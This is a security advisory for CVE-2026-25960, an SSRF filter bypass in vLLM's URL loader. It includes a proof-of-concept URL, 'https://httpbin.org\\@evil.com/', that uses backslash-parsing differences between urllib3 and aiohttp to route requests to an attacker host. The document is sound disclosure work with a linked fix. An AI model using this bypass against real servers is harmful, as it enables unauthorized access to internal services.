GHSA-v359-jj2v-j536
Suggest an improvement- Source
- https://github.com/advisories/GHSA-v359-jj2v-j536
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-v359-jj2v-j536/GHSA-v359-jj2v-j536.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-v359-jj2v-j536
- Aliases
-
- CVE-2026-25960
- Published
- 2026-03-09T19:55:32Z
- Modified
- 2026-03-10T18:47:18.743987Z
- Severity
-
- 5.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L CVSS Calculator
- Summary
- vLLM has SSRF Protection Bypass
- Details
-
Summary
The SSRF protection fix for https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc can be bypassed in the
load_from_url_asyncmethod due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client.Affected Component
- File:
vllm/connections.py - Function:
load_from_url_async
Vulnerability Details
Root Cause
The SSRF fix uses
urllib3.util.parse_url()to validate and extract the hostname from user-provided URLs. However,load_from_url_asyncusesaiohttpfor making the actual HTTP requests, andaiohttpinternally uses theyarllibrary for URL parsing.These two URL parsers handle backslash characters (
\) differently:| Parser | Input URL | Parsed Host | Parsed Path | Behavior | |--------|-----------|-------------|-------------|----------| |
urllib3.parse_url()|https://httpbin.org\@evil.com/|httpbin.org|/%5C@evil.com/| URL-encodes\as%5C, treats\@evil.com/as part of the path | |yarl(via aiohttp) |https://httpbin.org\@evil.com/|evil.com|/| Treats\as part of userinfo (user: httpbin.org\), the@acts as the userinfo/host separator |Attack Scenario
# Attacker provides this URL malicious_url = "https://httpbin.org\\@evil.com/" # 1. Validation layer (urllib3.parse_url) parsed = urllib3.util.parse_url(malicious_url) # parsed.host == "httpbin.org" ✅ Passes validation # 2. Actual request (aiohttp with yarl) async with aiohttp.ClientSession() as session: async with session.get(malicious_url) as response: # Request actually goes to evil.com! ❌ Bypass!Why This Happens
- yarl: Interprets
httpbin.org\as the userinfo component, and@as the userinfo/host separator, so the URL is parsed asuser=httpbin.org\,host=evil.com,path=/ - urllib3: URL-encodes the backslash as
%5C, so\@evil.com/becomes/%5C@evil.com/which is treated as part of the path, leavinghost=httpbin.org
This inconsistency allows an attacker to: - Bypass the hostname allowlist check - Access arbitrary internal/external services - Perform full SSRF attacks
Fixes
- https://github.com/vllm-project/vllm/pull/34743
- File:
- Database specific
{ "github_reviewed_at": "2026-03-09T19:55:32Z", "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "nvd_published_at": "2026-03-09T21:16:15Z", "severity": "MODERATE" }- References
-
- https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc
- https://github.com/vllm-project/vllm/security/advisories/GHSA-v359-jj2v-j536
- https://nvd.nist.gov/vuln/detail/CVE-2026-25960
- https://github.com/vllm-project/vllm/pull/34743
- https://github.com/vllm-project/vllm/commit/6f3b2047abd4a748e3db4a68543f8221358002c0
- https://github.com/vllm-project/vllm
Affected packages
PyPI / vllm
Package
- Name
- vllm
- View open source insights on deps.dev
- Purl
- pkg:pypi/vllm